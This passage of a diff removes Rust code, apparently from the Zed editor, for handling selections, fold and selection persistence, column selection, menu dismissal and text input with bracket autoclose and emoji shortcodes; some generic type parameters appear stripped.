pub fn set_use_modal_editing(&mut self, to: bool) { - self.use_modal_editing = to; - } - - pub fn use_modal_editing(&self) -> bool { - self.use_modal_editing - } - - fn selections_did_change( - &mut self, - local: bool, - old_cursor_position: &Anchor, - show_completions: bool, - window: &mut Window, - cx: &mut Context, - ) { - window.invalidate_character_coordinates(); - - // Copy selections to primary selection buffer - #[cfg(any(target_os = "linux", target_os = "freebsd"))] - if local { - let selections = self.selections.all::(cx); - let buffer_handle = self.buffer.read(cx).read(cx); - - let mut text = String::new(); - for (index, selection) in selections.iter().enumerate() { - let text_for_selection = buffer_handle - .text_for_range(selection.start..selection.end) - .collect::(); - - text.push_str(&text_for_selection); - if index != selections.len() - 1 { - text.push('\n'); - } - } - - if !text.is_empty() { - cx.write_to_primary(ClipboardItem::new_string(text)); - } - } - - if self.focus_handle.is_focused(window) && self.leader_peer_id.is_none() { - self.buffer.update(cx, |buffer, cx| { - buffer.set_active_selections( - &self.selections.disjoint_anchors(), - self.selections.line_mode, - self.cursor_shape, - cx, - ) - }); - } - let display_map = self - .display_map - .update(cx, |display_map, cx| display_map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - self.add_selections_state = None; - self.select_next_state = None; - self.select_prev_state = None; - self.select_syntax_node_history.try_clear(); - self.invalidate_autoclose_regions(&self.selections.disjoint_anchors(), buffer); - self.snippet_stack - .invalidate(&self.selections.disjoint_anchors(), buffer); - self.take_rename(false, window, cx); - - let new_cursor_position = self.selections.newest_anchor().head(); - - self.push_to_nav_history( - *old_cursor_position, - Some(new_cursor_position.to_point(buffer)), - false, - cx, - ); - - if local { - let new_cursor_position = 
self.selections.newest_anchor().head(); - let mut context_menu = self.context_menu.borrow_mut(); - let completion_menu = match context_menu.as_ref() { - Some(CodeContextMenu::Completions(menu)) => Some(menu), - _ => { - *context_menu = None; - None - } - }; - if let Some(buffer_id) = new_cursor_position.buffer_id { - if !self.registered_buffers.contains_key(&buffer_id) { - if let Some(project) = self.project.as_ref() { - project.update(cx, |project, cx| { - let Some(buffer) = self.buffer.read(cx).buffer(buffer_id) else { - return; - }; - self.registered_buffers.insert( - buffer_id, - project.register_buffer_with_language_servers(&buffer, cx), - ); - }) - } - } - } - - if let Some(completion_menu) = completion_menu { - let cursor_position = new_cursor_position.to_offset(buffer); - let (word_range, kind) = - buffer.surrounding_word(completion_menu.initial_position, true); - if kind == Some(CharKind::Word) - && word_range.to_inclusive().contains(&cursor_position) - { - let mut completion_menu = completion_menu.clone(); - drop(context_menu); - - let query = Self::completion_query(buffer, cursor_position); - cx.spawn(async move |this, cx| { - completion_menu - .filter(query.as_deref(), cx.background_executor().clone()) - .await; - - this.update(cx, |this, cx| { - let mut context_menu = this.context_menu.borrow_mut(); - let Some(CodeContextMenu::Completions(menu)) = context_menu.as_ref() - else { - return; - }; - - if menu.id > completion_menu.id { - return; - } - - *context_menu = Some(CodeContextMenu::Completions(completion_menu)); - drop(context_menu); - cx.notify(); - }) - }) - .detach(); - - if show_completions { - self.show_completions(&ShowCompletions { trigger: None }, window, cx); - } - } else { - drop(context_menu); - self.hide_context_menu(window, cx); - } - } else { - drop(context_menu); - } - - hide_hover(self, cx); - - if old_cursor_position.to_display_point(&display_map).row() - != new_cursor_position.to_display_point(&display_map).row() - { - 
self.available_code_actions.take(); - } - self.refresh_code_actions(window, cx); - self.refresh_document_highlights(cx); - self.refresh_selected_text_highlights(false, window, cx); - refresh_matching_bracket_highlights(self, window, cx); - self.update_visible_inline_completion(window, cx); - self.edit_prediction_requires_modifier_in_indent_conflict = true; - linked_editing_ranges::refresh_linked_ranges(self, window, cx); - self.inline_blame_popover.take(); - if self.git_blame_inline_enabled { - self.start_inline_blame_timer(window, cx); - } - } - - self.blink_manager.update(cx, BlinkManager::pause_blinking); - cx.emit(EditorEvent::SelectionsChanged { local }); - - let selections = &self.selections.disjoint; - if selections.len() == 1 { - cx.emit(SearchEvent::ActiveMatchChanged) - } - if local { - if let Some((_, _, buffer_snapshot)) = buffer.as_singleton() { - let inmemory_selections = selections - .iter() - .map(|s| { - text::ToPoint::to_point(&s.range().start.text_anchor, buffer_snapshot) - ..text::ToPoint::to_point(&s.range().end.text_anchor, buffer_snapshot) - }) - .collect(); - self.update_restoration_data(cx, |data| { - data.selections = inmemory_selections; - }); - - if WorkspaceSettings::get(None, cx).restore_on_startup - != RestoreOnStartupBehavior::None - { - if let Some(workspace_id) = - self.workspace.as_ref().and_then(|workspace| workspace.1) - { - let snapshot = self.buffer().read(cx).snapshot(cx); - let selections = selections.clone(); - let background_executor = cx.background_executor().clone(); - let editor_id = cx.entity().entity_id().as_u64() as ItemId; - self.serialize_selections = cx.background_spawn(async move { - background_executor.timer(SERIALIZATION_THROTTLE_TIME).await; - let db_selections = selections - .iter() - .map(|selection| { - ( - selection.start.to_offset(&snapshot), - selection.end.to_offset(&snapshot), - ) - }) - .collect(); - - DB.save_editor_selections(editor_id, workspace_id, db_selections) - .await - .with_context(|| 
format!("persisting editor selections for editor {editor_id}, workspace {workspace_id:?}")) - .log_err(); - }); - } - } - } - } - - cx.notify(); - } - - fn folds_did_change(&mut self, cx: &mut Context) { - use text::ToOffset as _; - use text::ToPoint as _; - - if WorkspaceSettings::get(None, cx).restore_on_startup == RestoreOnStartupBehavior::None { - return; - } - - let Some(singleton) = self.buffer().read(cx).as_singleton() else { - return; - }; - - let snapshot = singleton.read(cx).snapshot(); - let inmemory_folds = self.display_map.update(cx, |display_map, cx| { - let display_snapshot = display_map.snapshot(cx); - - display_snapshot - .folds_in_range(0..display_snapshot.buffer_snapshot.len()) - .map(|fold| { - fold.range.start.text_anchor.to_point(&snapshot) - ..fold.range.end.text_anchor.to_point(&snapshot) - }) - .collect() - }); - self.update_restoration_data(cx, |data| { - data.folds = inmemory_folds; - }); - - let Some(workspace_id) = self.workspace.as_ref().and_then(|workspace| workspace.1) else { - return; - }; - let background_executor = cx.background_executor().clone(); - let editor_id = cx.entity().entity_id().as_u64() as ItemId; - let db_folds = self.display_map.update(cx, |display_map, cx| { - display_map - .snapshot(cx) - .folds_in_range(0..snapshot.len()) - .map(|fold| { - ( - fold.range.start.text_anchor.to_offset(&snapshot), - fold.range.end.text_anchor.to_offset(&snapshot), - ) - }) - .collect() - }); - self.serialize_folds = cx.background_spawn(async move { - background_executor.timer(SERIALIZATION_THROTTLE_TIME).await; - DB.save_editor_folds(editor_id, workspace_id, db_folds) - .await - .with_context(|| { - format!( - "persisting editor folds for editor {editor_id}, workspace {workspace_id:?}" - ) - }) - .log_err(); - }); - } - - pub fn sync_selections( - &mut self, - other: Entity, - cx: &mut Context, - ) -> gpui::Subscription { - let other_selections = other.read(cx).selections.disjoint.to_vec(); - self.selections.change_with(cx, 
|selections| { - selections.select_anchors(other_selections); - }); - - let other_subscription = - cx.subscribe(&other, |this, other, other_evt, cx| match other_evt { - EditorEvent::SelectionsChanged { local: true } => { - let other_selections = other.read(cx).selections.disjoint.to_vec(); - if other_selections.is_empty() { - return; - } - this.selections.change_with(cx, |selections| { - selections.select_anchors(other_selections); - }); - } - _ => {} - }); - - let this_subscription = - cx.subscribe_self::(move |this, this_evt, cx| match this_evt { - EditorEvent::SelectionsChanged { local: true } => { - let these_selections = this.selections.disjoint.to_vec(); - if these_selections.is_empty() { - return; - } - other.update(cx, |other_editor, cx| { - other_editor.selections.change_with(cx, |selections| { - selections.select_anchors(these_selections); - }) - }); - } - _ => {} - }); - - Subscription::join(other_subscription, this_subscription) - } - - pub fn change_selections( - &mut self, - autoscroll: Option, - window: &mut Window, - cx: &mut Context, - change: impl FnOnce(&mut MutableSelectionsCollection<'_>) -> R, - ) -> R { - self.change_selections_inner(autoscroll, true, window, cx, change) - } - - fn change_selections_inner( - &mut self, - autoscroll: Option, - request_completions: bool, - window: &mut Window, - cx: &mut Context, - change: impl FnOnce(&mut MutableSelectionsCollection<'_>) -> R, - ) -> R { - let old_cursor_position = self.selections.newest_anchor().head(); - self.push_to_selection_history(); - - let (changed, result) = self.selections.change_with(cx, change); - - if changed { - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - self.selections_did_change(true, &old_cursor_position, request_completions, window, cx); - - if self.should_open_signature_help_automatically( - &old_cursor_position, - self.signature_help_state.backspace_pressed(), - cx, - ) { - self.show_signature_help(&ShowSignatureHelp, window, 
cx); - } - self.signature_help_state.set_backspace_pressed(false); - } - - result - } - - pub fn edit(&mut self, edits: I, cx: &mut Context) - where - I: IntoIterator, T)>, - S: ToOffset, - T: Into>, - { - if self.read_only(cx) { - return; - } - - self.buffer - .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); - } - - pub fn edit_with_autoindent(&mut self, edits: I, cx: &mut Context) - where - I: IntoIterator, T)>, - S: ToOffset, - T: Into>, - { - if self.read_only(cx) { - return; - } - - self.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, self.autoindent_mode.clone(), cx) - }); - } - - pub fn edit_with_block_indent( - &mut self, - edits: I, - original_indent_columns: Vec>, - cx: &mut Context, - ) where - I: IntoIterator, T)>, - S: ToOffset, - T: Into>, - { - if self.read_only(cx) { - return; - } - - self.buffer.update(cx, |buffer, cx| { - buffer.edit( - edits, - Some(AutoindentMode::Block { - original_indent_columns, - }), - cx, - ) - }); - } - - fn select(&mut self, phase: SelectPhase, window: &mut Window, cx: &mut Context) { - self.hide_context_menu(window, cx); - - match phase { - SelectPhase::Begin { - position, - add, - click_count, - } => self.begin_selection(position, add, click_count, window, cx), - SelectPhase::BeginColumnar { - position, - goal_column, - reset, - } => self.begin_columnar_selection(position, goal_column, reset, window, cx), - SelectPhase::Extend { - position, - click_count, - } => self.extend_selection(position, click_count, window, cx), - SelectPhase::Update { - position, - goal_column, - scroll_delta, - } => self.update_selection(position, goal_column, scroll_delta, window, cx), - SelectPhase::End => self.end_selection(window, cx), - } - } - - fn extend_selection( - &mut self, - position: DisplayPoint, - click_count: usize, - window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let tail = self.selections.newest::(cx).tail(); - 
self.begin_selection(position, false, click_count, window, cx); - - let position = position.to_offset(&display_map, Bias::Left); - let tail_anchor = display_map.buffer_snapshot.anchor_before(tail); - - let mut pending_selection = self - .selections - .pending_anchor() - .expect("extend_selection not called with pending selection"); - if position >= tail { - pending_selection.start = tail_anchor; - } else { - pending_selection.end = tail_anchor; - pending_selection.reversed = true; - } - - let mut pending_mode = self.selections.pending_mode().unwrap(); - match &mut pending_mode { - SelectMode::Word(range) | SelectMode::Line(range) => *range = tail_anchor..tail_anchor, - _ => {} - } - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.set_pending(pending_selection, pending_mode) - }); - } - - fn begin_selection( - &mut self, - position: DisplayPoint, - add: bool, - click_count: usize, - window: &mut Window, - cx: &mut Context, - ) { - if !self.focus_handle.is_focused(window) { - self.last_focused_descendant = None; - window.focus(&self.focus_handle); - } - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - let newest_selection = self.selections.newest_anchor().clone(); - let position = display_map.clip_point(position, Bias::Left); - - let start; - let end; - let mode; - let mut auto_scroll; - match click_count { - 1 => { - start = buffer.anchor_before(position.to_point(&display_map)); - end = start; - mode = SelectMode::Character; - auto_scroll = true; - } - 2 => { - let range = movement::surrounding_word(&display_map, position); - start = buffer.anchor_before(range.start.to_point(&display_map)); - end = buffer.anchor_before(range.end.to_point(&display_map)); - mode = SelectMode::Word(start..end); - auto_scroll = true; - } - 3 => { - let position = display_map - .clip_point(position, Bias::Left) - .to_point(&display_map); - let line_start = 
display_map.prev_line_boundary(position).0; - let next_line_start = buffer.clip_point( - display_map.next_line_boundary(position).0 + Point::new(1, 0), - Bias::Left, - ); - start = buffer.anchor_before(line_start); - end = buffer.anchor_before(next_line_start); - mode = SelectMode::Line(start..end); - auto_scroll = true; - } - _ => { - start = buffer.anchor_before(0); - end = buffer.anchor_before(buffer.len()); - mode = SelectMode::All; - auto_scroll = false; - } - } - auto_scroll &= EditorSettings::get_global(cx).autoscroll_on_clicks; - - let point_to_delete: Option = { - let selected_points: Vec> = - self.selections.disjoint_in_range(start..end, cx); - - if !add || click_count > 1 { - None - } else if !selected_points.is_empty() { - Some(selected_points[0].id) - } else { - let clicked_point_already_selected = - self.selections.disjoint.iter().find(|selection| { - selection.start.to_point(buffer) == start.to_point(buffer) - || selection.end.to_point(buffer) == end.to_point(buffer) - }); - - clicked_point_already_selected.map(|selection| selection.id) - } - }; - - let selections_count = self.selections.count(); - - self.change_selections(auto_scroll.then(Autoscroll::newest), window, cx, |s| { - if let Some(point_to_delete) = point_to_delete { - s.delete(point_to_delete); - - if selections_count == 1 { - s.set_pending_anchor_range(start..end, mode); - } - } else { - if !add { - s.clear_disjoint(); - } else if click_count > 1 { - s.delete(newest_selection.id) - } - - s.set_pending_anchor_range(start..end, mode); - } - }); - } - - fn begin_columnar_selection( - &mut self, - position: DisplayPoint, - goal_column: u32, - reset: bool, - window: &mut Window, - cx: &mut Context, - ) { - if !self.focus_handle.is_focused(window) { - self.last_focused_descendant = None; - window.focus(&self.focus_handle); - } - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - if reset { - let pointer_position = display_map - .buffer_snapshot - 
.anchor_before(position.to_point(&display_map)); - - self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { - s.clear_disjoint(); - s.set_pending_anchor_range( - pointer_position..pointer_position, - SelectMode::Character, - ); - }); - } - - let tail = self.selections.newest::(cx).tail(); - self.columnar_selection_tail = Some(display_map.buffer_snapshot.anchor_before(tail)); - - if !reset { - self.select_columns( - tail.to_display_point(&display_map), - position, - goal_column, - &display_map, - window, - cx, - ); - } - } - - fn update_selection( - &mut self, - position: DisplayPoint, - goal_column: u32, - scroll_delta: gpui::Point, - window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - if let Some(tail) = self.columnar_selection_tail.as_ref() { - let tail = tail.to_display_point(&display_map); - self.select_columns(tail, position, goal_column, &display_map, window, cx); - } else if let Some(mut pending) = self.selections.pending_anchor() { - let buffer = self.buffer.read(cx).snapshot(cx); - let head; - let tail; - let mode = self.selections.pending_mode().unwrap(); - match &mode { - SelectMode::Character => { - head = position.to_point(&display_map); - tail = pending.tail().to_point(&buffer); - } - SelectMode::Word(original_range) => { - let original_display_range = original_range.start.to_display_point(&display_map) - ..original_range.end.to_display_point(&display_map); - let original_buffer_range = original_display_range.start.to_point(&display_map) - ..original_display_range.end.to_point(&display_map); - if movement::is_inside_word(&display_map, position) - || original_display_range.contains(&position) - { - let word_range = movement::surrounding_word(&display_map, position); - if word_range.start < original_display_range.start { - head = word_range.start.to_point(&display_map); - } else { - head = word_range.end.to_point(&display_map); - } - } else { - head = 
position.to_point(&display_map); - } - - if head <= original_buffer_range.start { - tail = original_buffer_range.end; - } else { - tail = original_buffer_range.start; - } - } - SelectMode::Line(original_range) => { - let original_range = original_range.to_point(&display_map.buffer_snapshot); - - let position = display_map - .clip_point(position, Bias::Left) - .to_point(&display_map); - let line_start = display_map.prev_line_boundary(position).0; - let next_line_start = buffer.clip_point( - display_map.next_line_boundary(position).0 + Point::new(1, 0), - Bias::Left, - ); - - if line_start < original_range.start { - head = line_start - } else { - head = next_line_start - } - - if head <= original_range.start { - tail = original_range.end; - } else { - tail = original_range.start; - } - } - SelectMode::All => { - return; - } - }; - - if head < tail { - pending.start = buffer.anchor_before(head); - pending.end = buffer.anchor_before(tail); - pending.reversed = true; - } else { - pending.start = buffer.anchor_before(tail); - pending.end = buffer.anchor_before(head); - pending.reversed = false; - } - - self.change_selections(None, window, cx, |s| { - s.set_pending(pending, mode); - }); - } else { - log::error!("update_selection dispatched with no pending selection"); - return; - } - - self.apply_scroll_delta(scroll_delta, window, cx); - cx.notify(); - } - - fn end_selection(&mut self, window: &mut Window, cx: &mut Context) { - self.columnar_selection_tail.take(); - if self.selections.pending_anchor().is_some() { - let selections = self.selections.all::(cx); - self.change_selections(None, window, cx, |s| { - s.select(selections); - s.clear_pending(); - }); - } - } - - fn select_columns( - &mut self, - tail: DisplayPoint, - head: DisplayPoint, - goal_column: u32, - display_map: &DisplaySnapshot, - window: &mut Window, - cx: &mut Context, - ) { - let start_row = cmp::min(tail.row(), head.row()); - let end_row = cmp::max(tail.row(), head.row()); - let start_column = 
cmp::min(tail.column(), goal_column); - let end_column = cmp::max(tail.column(), goal_column); - let reversed = start_column < tail.column(); - - let selection_ranges = (start_row.0..=end_row.0) - .map(DisplayRow) - .filter_map(|row| { - if start_column <= display_map.line_len(row) && !display_map.is_block_line(row) { - let start = display_map - .clip_point(DisplayPoint::new(row, start_column), Bias::Left) - .to_point(display_map); - let end = display_map - .clip_point(DisplayPoint::new(row, end_column), Bias::Right) - .to_point(display_map); - if reversed { - Some(end..start) - } else { - Some(start..end) - } - } else { - None - } - }) - .collect::>(); - - self.change_selections(None, window, cx, |s| { - s.select_ranges(selection_ranges); - }); - cx.notify(); - } - - pub fn has_non_empty_selection(&self, cx: &mut App) -> bool { - self.selections - .all_adjusted(cx) - .iter() - .any(|selection| !selection.is_empty()) - } - - pub fn has_pending_nonempty_selection(&self) -> bool { - let pending_nonempty_selection = match self.selections.pending_anchor() { - Some(Selection { start, end, .. 
}) => start != end, - None => false, - }; - - pending_nonempty_selection - || (self.columnar_selection_tail.is_some() && self.selections.disjoint.len() > 1) - } - - pub fn has_pending_selection(&self) -> bool { - self.selections.pending_anchor().is_some() || self.columnar_selection_tail.is_some() - } - - pub fn cancel(&mut self, _: &Cancel, window: &mut Window, cx: &mut Context) { - self.selection_mark_mode = false; - - if self.clear_expanded_diff_hunks(cx) { - cx.notify(); - return; - } - if self.dismiss_menus_and_popups(true, window, cx) { - return; - } - - if self.mode.is_full() - && self.change_selections(Some(Autoscroll::fit()), window, cx, |s| s.try_cancel()) - { - return; - } - - cx.propagate(); - } - - pub fn dismiss_menus_and_popups( - &mut self, - is_user_requested: bool, - window: &mut Window, - cx: &mut Context, - ) -> bool { - if self.take_rename(false, window, cx).is_some() { - return true; - } - - if hide_hover(self, cx) { - return true; - } - - if self.hide_signature_help(cx, SignatureHelpHiddenBy::Escape) { - return true; - } - - if self.hide_context_menu(window, cx).is_some() { - return true; - } - - if self.mouse_context_menu.take().is_some() { - return true; - } - - if is_user_requested && self.discard_inline_completion(true, cx) { - return true; - } - - if self.snippet_stack.pop().is_some() { - return true; - } - - if self.mode.is_full() && matches!(self.active_diagnostics, ActiveDiagnostic::Group(_)) { - self.dismiss_diagnostics(cx); - return true; - } - - false - } - - fn linked_editing_ranges_for( - &self, - selection: Range, - cx: &App, - ) -> Option, Vec>>> { - if self.linked_edit_ranges.is_empty() { - return None; - } - let ((base_range, linked_ranges), buffer_snapshot, buffer) = - selection.end.buffer_id.and_then(|end_buffer_id| { - if selection.start.buffer_id != Some(end_buffer_id) { - return None; - } - let buffer = self.buffer.read(cx).buffer(end_buffer_id)?; - let snapshot = buffer.read(cx).snapshot(); - self.linked_edit_ranges - 
.get(end_buffer_id, selection.start..selection.end, &snapshot) - .map(|ranges| (ranges, snapshot, buffer)) - })?; - use text::ToOffset as TO; - // find offset from the start of current range to current cursor position - let start_byte_offset = TO::to_offset(&base_range.start, &buffer_snapshot); - - let start_offset = TO::to_offset(&selection.start, &buffer_snapshot); - let start_difference = start_offset - start_byte_offset; - let end_offset = TO::to_offset(&selection.end, &buffer_snapshot); - let end_difference = end_offset - start_byte_offset; - // Current range has associated linked ranges. - let mut linked_edits = HashMap::<_, Vec<_>>::default(); - for range in linked_ranges.iter() { - let start_offset = TO::to_offset(&range.start, &buffer_snapshot); - let end_offset = start_offset + end_difference; - let start_offset = start_offset + start_difference; - if start_offset > buffer_snapshot.len() || end_offset > buffer_snapshot.len() { - continue; - } - if self.selections.disjoint_anchor_ranges().any(|s| { - if s.start.buffer_id != selection.start.buffer_id - || s.end.buffer_id != selection.end.buffer_id - { - return false; - } - TO::to_offset(&s.start.text_anchor, &buffer_snapshot) <= end_offset - && TO::to_offset(&s.end.text_anchor, &buffer_snapshot) >= start_offset - }) { - continue; - } - let start = buffer_snapshot.anchor_after(start_offset); - let end = buffer_snapshot.anchor_after(end_offset); - linked_edits - .entry(buffer.clone()) - .or_default() - .push(start..end); - } - Some(linked_edits) - } - - pub fn handle_input(&mut self, text: &str, window: &mut Window, cx: &mut Context) { - let text: Arc = text.into(); - - if self.read_only(cx) { - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let selections = self.selections.all_adjusted(cx); - let mut bracket_inserted = false; - let mut edits = Vec::new(); - let mut linked_edits = HashMap::<_, Vec<_>>::default(); - let mut new_selections = 
Vec::with_capacity(selections.len()); - let mut new_autoclose_regions = Vec::new(); - let snapshot = self.buffer.read(cx).read(cx); - let mut clear_linked_edit_ranges = false; - - for (selection, autoclose_region) in - self.selections_with_autoclose_regions(selections, &snapshot) - { - if let Some(scope) = snapshot.language_scope_at(selection.head()) { - // Determine if the inserted text matches the opening or closing - // bracket of any of this language's bracket pairs. - let mut bracket_pair = None; - let mut is_bracket_pair_start = false; - let mut is_bracket_pair_end = false; - if !text.is_empty() { - let mut bracket_pair_matching_end = None; - // `text` can be empty when a user is using IME (e.g. Chinese Wubi Simplified) - // and they are removing the character that triggered IME popup. - for (pair, enabled) in scope.brackets() { - if !pair.close && !pair.surround { - continue; - } - - if enabled && pair.start.ends_with(text.as_ref()) { - let prefix_len = pair.start.len() - text.len(); - let preceding_text_matches_prefix = prefix_len == 0 - || (selection.start.column >= (prefix_len as u32) - && snapshot.contains_str_at( - Point::new( - selection.start.row, - selection.start.column - (prefix_len as u32), - ), - &pair.start[..prefix_len], - )); - if preceding_text_matches_prefix { - bracket_pair = Some(pair.clone()); - is_bracket_pair_start = true; - break; - } - } - if pair.end.as_str() == text.as_ref() && bracket_pair_matching_end.is_none() - { - // take first bracket pair matching end, but don't break in case a later bracket - // pair matches start - bracket_pair_matching_end = Some(pair.clone()); - } - } - if bracket_pair.is_none() && bracket_pair_matching_end.is_some() { - bracket_pair = Some(bracket_pair_matching_end.unwrap()); - is_bracket_pair_end = true; - } - } - - if let Some(bracket_pair) = bracket_pair { - let snapshot_settings = snapshot.language_settings_at(selection.start, cx); - let autoclose = self.use_autoclose && 
snapshot_settings.use_autoclose; - let auto_surround = - self.use_auto_surround && snapshot_settings.use_auto_surround; - if selection.is_empty() { - if is_bracket_pair_start { - // If the inserted text is a suffix of an opening bracket and the - // selection is preceded by the rest of the opening bracket, then - // insert the closing bracket. - let following_text_allows_autoclose = snapshot - .chars_at(selection.start) - .next() - .map_or(true, |c| scope.should_autoclose_before(c)); - - let preceding_text_allows_autoclose = selection.start.column == 0 - || snapshot.reversed_chars_at(selection.start).next().map_or( - true, - |c| { - bracket_pair.start != bracket_pair.end - || !snapshot - .char_classifier_at(selection.start) - .is_word(c) - }, - ); - - let is_closing_quote = if bracket_pair.end == bracket_pair.start - && bracket_pair.start.len() == 1 - { - let target = bracket_pair.start.chars().next().unwrap(); - let current_line_count = snapshot - .reversed_chars_at(selection.start) - .take_while(|&c| c != '\n') - .filter(|&c| c == target) - .count(); - current_line_count % 2 == 1 - } else { - false - }; - - if autoclose - && bracket_pair.close - && following_text_allows_autoclose - && preceding_text_allows_autoclose - && !is_closing_quote - { - let anchor = snapshot.anchor_before(selection.end); - new_selections.push((selection.map(|_| anchor), text.len())); - new_autoclose_regions.push(( - anchor, - text.len(), - selection.id, - bracket_pair.clone(), - )); - edits.push(( - selection.range(), - format!("{}{}", text, bracket_pair.end).into(), - )); - bracket_inserted = true; - continue; - } - } - - if let Some(region) = autoclose_region { - // If the selection is followed by an auto-inserted closing bracket, - // then don't insert that closing bracket again; just move the selection - // past the closing bracket. 
- let should_skip = selection.end == region.range.end.to_point(&snapshot) - && text.as_ref() == region.pair.end.as_str(); - if should_skip { - let anchor = snapshot.anchor_after(selection.end); - new_selections - .push((selection.map(|_| anchor), region.pair.end.len())); - continue; - } - } - - let always_treat_brackets_as_autoclosed = snapshot - .language_settings_at(selection.start, cx) - .always_treat_brackets_as_autoclosed; - if always_treat_brackets_as_autoclosed - && is_bracket_pair_end - && snapshot.contains_str_at(selection.end, text.as_ref()) - { - // Otherwise, when `always_treat_brackets_as_autoclosed` is set to `true - // and the inserted text is a closing bracket and the selection is followed - // by the closing bracket then move the selection past the closing bracket. - let anchor = snapshot.anchor_after(selection.end); - new_selections.push((selection.map(|_| anchor), text.len())); - continue; - } - } - // If an opening bracket is 1 character long and is typed while - // text is selected, then surround that text with the bracket pair. 
- else if auto_surround - && bracket_pair.surround - && is_bracket_pair_start - && bracket_pair.start.chars().count() == 1 - { - edits.push((selection.start..selection.start, text.clone())); - edits.push(( - selection.end..selection.end, - bracket_pair.end.as_str().into(), - )); - bracket_inserted = true; - new_selections.push(( - Selection { - id: selection.id, - start: snapshot.anchor_after(selection.start), - end: snapshot.anchor_before(selection.end), - reversed: selection.reversed, - goal: selection.goal, - }, - 0, - )); - continue; - } - } - } - - if self.auto_replace_emoji_shortcode - && selection.is_empty() - && text.as_ref().ends_with(':') - { - if let Some(possible_emoji_short_code) = - Self::find_possible_emoji_shortcode_at_position(&snapshot, selection.start) - { - if !possible_emoji_short_code.is_empty() { - if let Some(emoji) = emojis::get_by_shortcode(&possible_emoji_short_code) { - let emoji_shortcode_start = Point::new( - selection.start.row, - selection.start.column - possible_emoji_short_code.len() as u32 - 1, - ); - - // Remove shortcode from buffer - edits.push(( - emoji_shortcode_start..selection.start, - "".to_string().into(), - )); - new_selections.push(( - Selection { - id: selection.id, - start: snapshot.anchor_after(emoji_shortcode_start), - end: snapshot.anchor_before(selection.start), - reversed: selection.reversed, - goal: selection.goal, - }, - 0, - )); - - // Insert emoji - let selection_start_anchor = snapshot.anchor_after(selection.start); - new_selections.push((selection.map(|_| selection_start_anchor), 0)); - edits.push((selection.start..selection.end, emoji.to_string().into())); - - continue; - } - } - } - } - - // If not handling any auto-close operation, then just replace the selected - // text with the given input and move the selection to the end of the - // newly inserted text. 
- let anchor = snapshot.anchor_after(selection.end); - if !self.linked_edit_ranges.is_empty() { - let start_anchor = snapshot.anchor_before(selection.start); - - let is_word_char = text.chars().next().map_or(true, |char| { - let classifier = snapshot.char_classifier_at(start_anchor.to_offset(&snapshot)); - classifier.is_word(char) - }); - - if is_word_char { - if let Some(ranges) = self - .linked_editing_ranges_for(start_anchor.text_anchor..anchor.text_anchor, cx) - { - for (buffer, edits) in ranges { - linked_edits - .entry(buffer.clone()) - .or_default() - .extend(edits.into_iter().map(|range| (range, text.clone()))); - } - } - } else { - clear_linked_edit_ranges = true; - } - } - - new_selections.push((selection.map(|_| anchor), 0)); - edits.push((selection.start..selection.end, text.clone())); - } - - drop(snapshot); - - self.transact(window, cx, |this, window, cx| { - if clear_linked_edit_ranges { - this.linked_edit_ranges.clear(); - } - let initial_buffer_versions = - jsx_tag_auto_close::construct_initial_buffer_versions_map(this, &edits, cx); - - this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, this.autoindent_mode.clone(), cx); - }); - for (buffer, edits) in linked_edits { - buffer.update(cx, |buffer, cx| { - let snapshot = buffer.snapshot(); - let edits = edits - .into_iter() - .map(|(range, text)| { - use text::ToPoint as TP; - let end_point = TP::to_point(&range.end, &snapshot); - let start_point = TP::to_point(&range.start, &snapshot); - (start_point..end_point, text) - }) - .sorted_by_key(|(range, _)| range.start); - buffer.edit(edits, None, cx); - }) - } - let new_anchor_selections = new_selections.iter().map(|e| &e.0); - let new_selection_deltas = new_selections.iter().map(|e| e.1); - let map = this.display_map.update(cx, |map, cx| map.snapshot(cx)); - let new_selections = resolve_selections::(new_anchor_selections, &map) - .zip(new_selection_deltas) - .map(|(selection, delta)| Selection { - id: selection.id, - start: selection.start + 
delta, - end: selection.end + delta, - reversed: selection.reversed, - goal: SelectionGoal::None, - }) - .collect::>(); - - let mut i = 0; - for (position, delta, selection_id, pair) in new_autoclose_regions { - let position = position.to_offset(&map.buffer_snapshot) + delta; - let start = map.buffer_snapshot.anchor_before(position); - let end = map.buffer_snapshot.anchor_after(position); - while let Some(existing_state) = this.autoclose_regions.get(i) { - match existing_state.range.start.cmp(&start, &map.buffer_snapshot) { - Ordering::Less => i += 1, - Ordering::Greater => break, - Ordering::Equal => { - match end.cmp(&existing_state.range.end, &map.buffer_snapshot) { - Ordering::Less => i += 1, - Ordering::Equal => break, - Ordering::Greater => break, - } - } - } - } - this.autoclose_regions.insert( - i, - AutocloseRegion { - selection_id, - range: start..end, - pair, - }, - ); - } - - let had_active_inline_completion = this.has_active_inline_completion(); - this.change_selections_inner(Some(Autoscroll::fit()), false, window, cx, |s| { - s.select(new_selections) - }); - - if !bracket_inserted { - if let Some(on_type_format_task) = - this.trigger_on_type_formatting(text.to_string(), window, cx) - { - on_type_format_task.detach_and_log_err(cx); - } - } - - let editor_settings = EditorSettings::get_global(cx); - if bracket_inserted - && (editor_settings.auto_signature_help - || editor_settings.show_signature_help_after_edits) - { - this.show_signature_help(&ShowSignatureHelp, window, cx); - } - - let trigger_in_words = - this.show_edit_predictions_in_menu() || !had_active_inline_completion; - if this.hard_wrap.is_some() { - let latest: Range = this.selections.newest(cx).range(); - if latest.is_empty() - && this - .buffer() - .read(cx) - .snapshot(cx) - .line_len(MultiBufferRow(latest.start.row)) - == latest.start.column - { - this.rewrap_impl( - RewrapOptions { - override_language_settings: true, - preserve_existing_whitespace: true, - }, - cx, - ) - } - } - 
